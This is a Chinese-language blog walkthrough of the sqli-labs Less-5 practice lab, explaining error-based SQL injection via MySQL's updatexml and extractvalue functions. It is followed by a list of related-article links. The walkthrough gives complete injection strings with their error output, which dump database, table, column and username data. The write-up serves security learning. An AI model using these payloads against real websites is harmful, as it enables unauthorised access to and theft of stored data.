基於sqli-labs Less-5 sql報錯注入詳解

星海河發表於2024-09-17

按照之前的思路發現，是正常的'閉合的字元型，但是在聯合注入0' union select 1,2,3--+沒有回顯注入點，只是回顯You are in，因此無法使用聯合注入，考慮使用報錯注入或者盲注。
考慮到本題會給出資料庫的錯誤資訊，且盲注比較麻煩，嘗試使用報錯注入

1. 報錯注入函式簡介

1.1 updatexml函式

UPDATEXML 是 MySQL 中的一個 XML 函式，用於解析 XML 資料並返回結果。

UPDATEXML(xml_target, xpath_expr, new_xml)

xml_target：要操作的 XML 文件。
xpath_expr：一個字串，表示 XPath 表示式，用於指定要更新的節點。
new_xml：要替換的新的 XML 內容。

在SQL隱碼攻擊中，不妨把他簡化為updatexml(xx,concat(xx),xx)，concat函式用來拼接字元，當第二個引數為非xpath格式就會把校驗失敗的資料爆出來。由於要的只是第二個引數，一三隨便寫即可

1.2 extractvalue函式

EXTRACTVALUE 是 MySQL 中的一個函式，用於從 XML 文件中提取指定的值。該函式使用 XPath 表示式從 XML 資料中選擇和返回節點的文字內容。

EXTRACTVALUE(xml_frag, xpath_expr)

xml_frag：包含 XML 資料的字串。
xpath_expr：一個字串，表示 XPath 表示式，用於指定要提取的節點。

在SQL隱碼攻擊中，不妨把他簡化為extractvalue(xx,concat(xx))，concat函式用來拼接字元，當第二個引數為非xpath格式就會把校驗失敗的資料爆出來。由於要的只是第二個引數，引數一隨便寫即可。

2. updatexml報錯

0x7e為~，方便我們在報錯回顯中找到資料。
透過拼接需要的內容作為路徑，報錯後路徑被爆出，從而得到資料。

?id=1' and updatexml(1,concat(0x7e,(select database() ),0x7e),1) --+
'回顯：XPATH syntax error: '~security~'

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' ),0x7e),1) --+
'回顯：XPATH syntax error: '~emails,referers,uagents,users~'

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e),1)--+
'回顯：XPATH syntax error: '~id,username,password~'

?id=1' and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1)--+
'回顯：XPATH syntax error: '~Dumb,Angelina,Dummy,secure,stup'

3. extractvalue報錯

透過拼接需要的內容作為路徑，報錯後路徑被爆出，從而得到資料。

?id=1' and extractvalue(1,concat(0x7e,(select database() ),0x7e))--+
'回顯：XPATH syntax error: '~security~'

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' ),0x7e))--+
'XPATH syntax error: '~emails,referers,uagents,users~'

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e))--+
'XPATH syntax error: '~id,username,password~'

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username) from security.users),0x7e))--+
'XPATH syntax error: '~Dumb,Angelina,Dummy,secure,stup'

宇宙安全宣告

本部落格所提供的內容僅供學習與交流目的，所有文章、程式碼及相關資料僅用於提升網路安全知識水平。博主不對任何人因使用部落格中提到的技術或工具而產生的任何後果負責。

基於sqli-labs Less-1的sql聯合注入詳解
2024-09-11
SQL
基於報錯的注入模式
2018-07-26
模式
SQL 注入技術詳解
2016-06-24
SQL
使用exp進行SQL報錯注入
2020-08-19
SQL
常見sql注入原理詳解！
2017-11-19
SQL
SQL 注入攻防入門詳解
2016-08-08
SQL
SQL隱碼攻擊 - 手工注入sqli-labs
2024-03-05
SQL
封神臺Oracle注入- 報錯注入
2020-10-05
Oracle
實戰記錄之SQL server報錯手工注入
2020-06-08
SQLServer
SQL隱碼攻擊：sqli-labs lesson-1 小白詳解
2021-07-22
SQL
關於集合遍歷並刪除報錯詳解
2019-03-12
sqli-labs第二關詳解
2020-10-05
SQL
sqli-labs靶場實現（十）【二次注入（二階注入）】（less-24、具體步驟+圖文詳解）
2021-01-05
SQL
sqli-labs ————Stacked 注入攻擊介紹
2018-05-20
SQL
sqli-labs第3-4關詳解
2020-10-07
SQL
MySQL·效能優化·SQL錯誤用法詳解
2017-04-08
MySql優化
基於autofac的屬性注入
2021-03-16
Mybatis批量更新SQL報錯☞解決辦法
2018-08-31
MyBatisSQL
天兔監控SQL Azure報錯解決案例
2017-10-23
SQL
Mysql報錯注入原理分析(count()、rand()、group by)
2020-08-19
MySql
基於註解的 Spring MVC詳解
2016-11-25
SpringMVC
SQL 注入:聯合注入
2020-02-11
SQL
sql注入之union注入
2020-12-13
SQL
sql注入
2018-07-26
SQL
SQL 注入
2024-04-15
SQL
sqli-Labs————less-46（order by 之後的注入）
2018-05-21
SQL
sqli-labs靶場實現（九）【寬位元組注入（1）、寬位元組注入（2）】（less-33、less-32具體步驟+圖文詳解）
2021-01-03
SQL
Sql Server基礎：資料型別詳解
2015-05-07
SQLServer資料型別
基於聯合查詢的注入
2018-07-26
基於 Swoole 搭建 WebSocket 服務詳解
2022-09-26
Web
mysqldump 引數詳解（基於MySQL 5.6）
2015-12-14
MySql
Dependency Injection-依賴注入詳解
2018-04-25
依賴注入
多表聯合查詢 - 基於註解SQL
2021-06-02
SQL
sql注入修改
2020-08-04
SQL
sql注入1
2018-07-26
SQL
sql注入2
2018-08-03
SQL
SQL防注入
2017-03-02
SQL
防止sql注入
2024-06-05
SQL
Java開發學習(十二)----基於註解開發依賴注入
2022-07-13
Java依賴注入